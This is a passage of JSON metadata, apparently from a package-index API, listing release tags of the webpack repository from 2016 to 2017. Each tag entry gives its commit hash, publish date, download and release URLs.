ublished_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G